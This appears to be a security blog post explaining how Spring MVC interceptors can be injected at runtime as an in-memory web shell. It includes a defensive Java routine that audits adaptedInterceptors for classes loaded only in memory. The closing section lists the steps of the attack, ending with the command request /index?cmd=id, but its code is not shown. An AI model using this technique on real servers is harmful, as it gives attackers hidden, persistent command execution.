Spring Interceptor Memory Shell
October 22, 2024, about 1 minute read
The Interceptor discussed here is the Spring interceptor: Spring's AOP-based counterpart to the Filter idea. Other frameworks such as Struts2 implement the same interceptor concept, but only the Spring interceptor is studied here. An Interceptor primarily intercepts requests to Controllers.
How Interceptors are invoked and stored, roughly:
- Spring MVC enters its own processing logic through the `doDispatch` method of DispatcherServlet;
- `getHandler` iterates over the `handlerMappings` property and picks the HandlerMapping that matches the current request;
- the HandlerMapping's `getHandler` method iterates over every HandlerInterceptor instance in `this.adaptedInterceptors` and adds them to the HandlerExecutionChain's `interceptorList`;
- `applyPreHandle` of HandlerExecutionChain is called; it iterates over those HandlerInterceptor instances and calls each one's `preHandle` to run the interceptor logic.
From this flow it follows that an interceptor must be a HandlerInterceptor instance and is stored in the `adaptedInterceptors` field of AbstractHandlerMapping.
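Because `adaptedInterceptors` is the single place an injected interceptor must live, it is also the place to audit. The routine below is an added example (not code from the original post, nor su18's); it assumes a Spring 5.x application context and a hypothetical package name, reads the private field by reflection, and flags interceptor classes that have no backing `.class` resource or no CodeSource, which is what a class defined at runtime from a byte array looks like.

```java
package example.audit; // hypothetical package name

import java.lang.reflect.Field;
import java.security.CodeSource;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

import org.springframework.context.ApplicationContext;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.handler.MappedInterceptor;

/**
 * Lists every interceptor held in the adaptedInterceptors field of each
 * AbstractHandlerMapping bean and marks the ones that look in-memory only.
 */
public class InterceptorAudit {

    public static List<String> audit(ApplicationContext ctx) throws ReflectiveOperationException {
        // Private field on AbstractHandlerMapping; the name comes from the flow described above.
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);

        List<String> report = new ArrayList<>();
        Map<String, AbstractHandlerMapping> mappings = ctx.getBeansOfType(AbstractHandlerMapping.class);
        for (Map.Entry<String, AbstractHandlerMapping> entry : mappings.entrySet()) {
            @SuppressWarnings("unchecked")
            List<HandlerInterceptor> interceptors = (List<HandlerInterceptor>) field.get(entry.getValue());
            for (HandlerInterceptor hi : interceptors) {
                // Path-scoped interceptors are wrapped in MappedInterceptor; inspect the real target.
                Object target = (hi instanceof MappedInterceptor) ? ((MappedInterceptor) hi).getInterceptor() : hi;
                Class<?> cls = target.getClass();
                ClassLoader loader = cls.getClassLoader();
                CodeSource cs = cls.getProtectionDomain().getCodeSource();
                String location = (cs != null && cs.getLocation() != null) ? cs.getLocation().toString() : "<none>";
                // A class loaded from a jar or directory can be found again as a resource;
                // one handed to defineClass() from a byte array (e.g. a Base64 blob) cannot.
                boolean onDisk = loader != null
                        && loader.getResource(cls.getName().replace('.', '/') + ".class") != null;
                String verdict = (onDisk && cs != null) ? "ok" : "SUSPICIOUS (in-memory class)";
                report.add(String.format("%s -> %s [loader=%s, source=%s] %s",
                        entry.getKey(), cls.getName(), loader, location, verdict));
            }
        }
        return report;
    }
}
```

Expect false positives for CGLIB or other generated proxy classes, which also lack a `.class` resource; compare the report against a baseline taken at clean startup rather than treating every hit as an injection.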
Dynamically registering an Interceptor
Let's also look at the class that su18 injects:
Compile and deploy it, then look at the result:
/addInterceptor:
/index:
Registering a malicious Interceptor
Write the malicious Interceptor:
Compile it to a class file and convert it to a Base64 string
Replace the corresponding registration code, then compile and deploy and look at the result:
index:
/addInterceptor:
/index?cmd=id: